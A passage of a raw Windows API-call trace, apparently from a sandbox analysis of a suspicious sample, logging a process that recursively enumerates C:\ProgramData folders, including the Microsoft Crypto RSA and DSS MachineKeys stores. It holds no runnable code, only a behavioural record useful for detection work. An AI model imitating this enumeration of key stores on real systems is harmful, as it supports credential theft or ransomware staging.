[0111.798] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0111.798] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0111.798] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0 [0111.798] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0111.798] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.798] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0111.799] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.799] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.799] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0111.929] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.929] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.929] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.929] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.929] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0 [0111.930] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.930] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0111.930] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0 [0111.930] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0111.930] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.930] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.930] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.932] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.932] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0xffffffff [0111.932] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0111.932] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0xffffffff [0111.932] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0111.932] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0xffffffff [0111.933] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0111.933] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Favorites\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0xffffffff [0111.933] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0111.933] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.933] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.933] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0111.933] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.933] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0111.933] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.933] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0111.934] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.934] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2a0 [0111.937] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.937] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.937] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.937] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.937] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.937] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.937] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.937] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.937] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0 [0111.937] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0111.938] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0111.938] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0 [0111.938] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0111.938] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0111.938] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0 [0111.938] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.938] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.939] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0 [0111.939] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0111.939] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.940] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0111.940] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.940] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0111.940] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.940] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0111.941] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.941] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0 [0111.941] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0111.941] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.941] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0 [0111.941] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.941] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.941] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.941] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0111.941] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.941] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0 [0111.941] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.941] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.941] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.941] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0111.941] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.941] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.941] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0111.942] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.942] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0 [0111.942] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0111.942] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.942] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0xffffffff [0111.942] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.942] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0 [0111.942] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.942] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.942] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0 [0111.942] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0111.942] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0111.943] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.943] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0111.944] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.944] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.944] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0111.944] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.944] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.944] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0111.961] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.961] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.961] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.962] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.962] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.962] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.962] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0 [0111.962] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0111.962] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.962] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0111.962] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.962] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.963] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.963] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.963] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0 [0111.963] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0111.963] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.963] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0 [0111.963] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.963] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.963] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0111.963] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.963] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0111.965] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.965] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2a0 [0111.966] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0 [0111.966] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0111.966] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.966] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.967] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0 [0111.967] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0111.967] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.967] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c260 [0111.968] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.968] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.968] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c2a0 [0111.968] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.968] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.969] FindNextFileW (in: hFindFile=0x29c2a0, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0 [0111.969] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0111.969] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0111.969] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.969] GetLastError () returned 0x12 [0111.969] SetLastError (dwErrCode=0x12) [0111.969] GetLastError () returned 0x12 [0111.969] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.969] GetLastError () returned 0x12 [0111.969] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.969] GetLastError () returned 0x12 [0111.969] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.969] GetLastError () returned 0x12 [0111.969] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.969] GetLastError () returned 0x12 [0111.969] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.969] GetLastError () returned 0x12 [0111.969] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.969] GetLastError () returned 0x12 [0111.969] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.969] GetLastError () returned 0x12 [0111.970] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0111.970] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0111.970] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.970] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.970] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0111.970] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0111.971] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0111.972] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0111.973] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0111.973] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0111.973] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0111.973] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.973] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.973] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0111.974] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0111.975] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0111.975] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c220 [0111.975] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.975] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.975] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0111.976] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3fa0050 | out: hHeap=0x1db0000) returned 1 [0111.977] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0111.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0112.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c1e0 [0112.076] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.076] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.076] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.076] HeapFree (in: hHeap=0x1db0000, 